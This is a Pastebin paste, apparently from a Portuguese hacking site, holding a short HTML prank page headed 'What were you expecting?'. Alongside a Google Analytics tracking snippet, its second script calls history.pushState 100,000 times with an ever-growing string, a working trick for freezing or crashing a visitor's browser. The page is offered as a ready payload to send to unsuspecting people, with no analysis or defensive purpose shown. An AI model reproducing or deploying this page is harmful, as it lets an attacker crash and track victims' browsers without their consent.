Advertisement
Guest User

Criado por HackersPortugal.com

a guest
Jan 30th, 2016
1,628
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.92 KB | None | 0 0
  1.  
  2. <!DOCTYPE html>
  3. <html>
  4.     <body>
  5.         <h1>What were you expecting?</h1>
  6.         <script>
  7.             (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  8.                     (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  9.                     m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  10.                     })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  11.  
  12.                     ga('create', 'UA-60737367-1', 'auto');
  13.                     ga('send', 'pageview');
  14.                 </script>
  15.                 <script>
  16.                     var total = "";
  17.                     for( var i = 0; i < 100000; i++ ) {
  18.                        total = total + i.toString();
  19.                        history.pushState(0,0, total );
  20.                    }
  21.                </script>
  22.             </body>
  23.         </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement